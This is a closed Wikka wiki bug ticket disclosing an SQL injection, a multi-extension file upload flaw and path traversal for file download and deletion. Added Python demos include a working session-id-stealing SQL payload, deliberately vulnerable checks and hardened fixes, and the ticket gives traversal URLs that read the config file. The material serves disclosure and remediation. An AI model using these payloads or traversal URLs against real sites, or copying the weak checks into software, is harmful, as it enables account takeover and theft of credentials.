Ticket #1097 (closed defect: fixed)
Multiple Security Vulnerabilities
| Reported by: | EgiX | Owned by: | BrianKoontz |
|---|---|---|---|
| Priority: | highest | Milestone: | 1.3.2-patches |
| Component: | unspecified | Version: | 1.3.2-p1 |
| Severity: | critical | Keywords: | |
| Cc: | | | |
Description (last modified by BrianKoontz)
Hi, I've found some security flaws affecting versions 1.3.1 and 1.3.2.
The first is a SQL Injection here:
http://wush.net/trac/wikka/browser/trunk/actions/usersettings/usersettings.php#L136
When handling the 'update' action, 'default_comment_display' is the only parameter that isn't sanitized with mysql_real_escape_string(); this can be exploited to inject arbitrary SQL code. Because this is a multi-line query and the latest version of MySQL doesn't allow starting a comment with /* not followed by a */, it's sometimes impossible to alter the 'users' table content, e.g. to change the admin's password, but it's still possible to inject a subquery to fetch, e.g., the admin's session id for a Session Hijacking attack.
The second is an Arbitrary File Upload here:
http://wush.net/trac/wikka/browser/trunk/actions/files/files.php#L266
If 'INTRANET_MODE' is explicitly enabled, or if an attacker conducts a successful Session Hijacking attack using the first vulnerability, it's possible to upload files that contain multiple extensions due to insufficient input sanitization at line 276. Now look at the $allowed_extensions variable definition:
'gif|jpeg|jpg|jpe|png|doc|xls|csv|ppt|ppz|pps|pot|pdf|asc|txt|zip|gtar|gz|bz2|tar|rar|vpp|mpp|vsd|mm|htm|html'
It contains some extensions (e.g. mm, vpp...) that are rare to see in an Apache MIME type configuration. This could lead to executing arbitrary PHP code.
The last ones are Arbitrary File Download and Arbitrary File Deletion here:
http://wush.net/trac/wikka/browser/trunk/handlers/files.xml/files.xml.php#L53
The only input sanitization of the supplied filename is done at line 54: it checks whether the filename starts with a dot, and if not, the filename is accepted. But an attacker could request a URL like this:
http://localhost/wikka/test/files.xml?action=download&file=/../../wikka.config.php
to download, e.g., the config file (note that 'test' is a page containing the {{files}} action, but attachments aren't required to download or delete arbitrary files).
Similarly, if an attacker conducts a successful Session Hijacking attack, he could request a URL like this to delete arbitrary files:
http://localhost/wikka/test?action=delete&file=/../../wikka.config.php
Regards,
EgiX
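The first finding above (a multi-line UPDATE in which one field is concatenated unescaped, so that a self-contained subquery can be injected even where a trailing comment would not work) reconstructed as a runnable demonstration. This is an added example, not Wikka's usersettings.php code: it uses SQLite in place of MySQL (so string concatenation is `||`; on MySQL one would use CONCAT()), the `users` table columns other than `default_comment_display` are assumptions, and the escaping helper is a stand-in for mysql_real_escape_string(). The payload copies the admin's session id into the attacker's own `default_comment_display`, which the settings page would then echo back.

```python
import sqlite3

# Constructed stand-in schema for the Wikka 'users' table; only
# 'default_comment_display' is taken from the report, the rest is assumed.
SCHEMA = """
CREATE TABLE users (
    name TEXT PRIMARY KEY,
    password TEXT NOT NULL,
    sessionid TEXT,
    doubleclickedit TEXT,
    default_comment_display TEXT
);
"""

# Constructed sample rows.
SEED = [
    ("admin",   "hash-of-admin-password",   "adm1n-session-id",   "Y", "threaded"),
    ("mallory", "hash-of-mallory-password", "mallory-session-id", "Y", "threaded"),
]


def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SEED)
    return db


def escape(value):
    # Stand-in for mysql_real_escape_string(); SQLite quotes by doubling.
    return value.replace("'", "''")


def update_settings_vulnerable(db, name, doubleclickedit, default_comment_display):
    # Multi-line query: every field is escaped EXCEPT default_comment_display,
    # mirroring the flaw the report describes. Returns the SQL for inspection.
    sql = (
        "UPDATE users SET\n"
        "  doubleclickedit = '" + escape(doubleclickedit) + "',\n"
        "  default_comment_display = '" + default_comment_display + "'\n"
        "WHERE name = '" + escape(name) + "'"
    )
    db.execute(sql)
    db.commit()
    return sql


def update_settings_fixed(db, name, doubleclickedit, default_comment_display):
    # Hardened form: bound parameters, the value can never become SQL.
    db.execute(
        "UPDATE users SET doubleclickedit = ?, default_comment_display = ? "
        "WHERE name = ?",
        (doubleclickedit, default_comment_display, name),
    )
    db.commit()


def read_display(db, name):
    row = db.execute(
        "SELECT default_comment_display FROM users WHERE name = ?", (name,)
    ).fetchone()
    return row[0]


# No comment sequence is needed: the quotes are balanced and the following
# WHERE line stays syntactically valid, so the subquery runs as part of the
# attacker's own row update.
PAYLOAD = "' || (SELECT sessionid FROM users WHERE name = 'admin') || '"


def demo_vulnerable():
    db = fresh_db()
    update_settings_vulnerable(db, "mallory", "Y", PAYLOAD)
    return read_display(db, "mallory")   # admin's session id leaks here


def demo_fixed():
    db = fresh_db()
    update_settings_fixed(db, "mallory", "Y", PAYLOAD)
    return read_display(db, "mallory")   # payload stored as a literal string


if __name__ == "__main__":
    print("vulnerable:", demo_vulnerable())
    print("fixed:     ", demo_fixed())
```

The point to check in a fix is not only that the missing escape is added but that no field of the query is built by concatenation at all; the bound-parameter form above is the shape to aim for.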
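The second and third findings (an extension check that accepts a filename carrying several extensions, and a download/delete handler whose only filename check is "does not start with a dot") as a pair of weak checks next to hardened ones. This is an added example in Python, not Wikka's files.php or files.xml.php code: the weak checks are constructed to reproduce the behaviour the report describes, not copied from the project, the upload directory path is an assumption, and the extension list is the one quoted in the report. The weak resolver mimics PHP string concatenation of directory and filename, which is why `/../../wikka.config.php` climbs two levels out of the per-page upload directory.

```python
import os
import re

# Extension list quoted in the report (from $allowed_extensions).
ALLOWED_EXTENSIONS = set(
    "gif|jpeg|jpg|jpe|png|doc|xls|csv|ppt|ppz|pps|pot|pdf|asc|txt|zip|"
    "gtar|gz|bz2|tar|rar|vpp|mpp|vsd|mm|htm|html".split("|")
)

# Assumed layout: uploads/<page> sits two levels below the wikka root.
UPLOAD_DIR = "/var/www/wikka/uploads/test"


# --- upload: extension checks -------------------------------------------

def upload_name_ok_weak(filename):
    # Constructed weak check: only the LAST extension is consulted, so
    # "shell.php.mm" is accepted and, on an Apache where .mm has no MIME
    # mapping, may be handed to the PHP handler because of the .php part.
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_EXTENSIONS


def upload_name_ok_hardened(filename):
    # Exactly one extension, a conservative basename, allow-listed suffix.
    parts = filename.split(".")
    if len(parts) != 2:
        return False
    base, ext = parts
    return bool(re.fullmatch(r"[A-Za-z0-9_-]{1,64}", base)) and ext.lower() in ALLOWED_EXTENSIONS


# --- download / delete: path checks -------------------------------------

def filename_ok_weak(filename):
    # Constructed weak check mirroring the report: reject only a leading dot.
    return not filename.startswith(".")


def resolve_attachment_weak(upload_dir, filename):
    # PHP-style concatenation: "/../../x" is not rejected and climbs out.
    if not filename_ok_weak(filename):
        return None
    return os.path.normpath(upload_dir + "/" + filename)


def resolve_attachment_hardened(upload_dir, filename):
    # 1. The name must be a single path component of safe characters.
    if ".." in filename or not re.fullmatch(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,127}", filename):
        return None
    # 2. Canonicalise and confirm the target still lives in the upload root.
    root = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(root, filename))
    if os.path.dirname(target) != root:
        return None
    return target


if __name__ == "__main__":
    for name in ("report.pdf", "shell.php.mm"):
        print(name, upload_name_ok_weak(name), upload_name_ok_hardened(name))
    for name in ("notes.txt", "/../../wikka.config.php"):
        print(name, resolve_attachment_weak(UPLOAD_DIR, name),
              resolve_attachment_hardened(UPLOAD_DIR, name))
```

Two checks are used in the hardened resolver on purpose: the character allow-list rejects separators and `..` up front, and the realpath comparison catches anything that still escapes (symlinks, odd encodings) so that a later change to the first check does not silently reopen the traversal. For uploads, renaming the stored file to a generated basename with the single validated extension removes the multi-extension problem entirely.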
Related tickets
#1098 RCE and CSRF vulnerabilities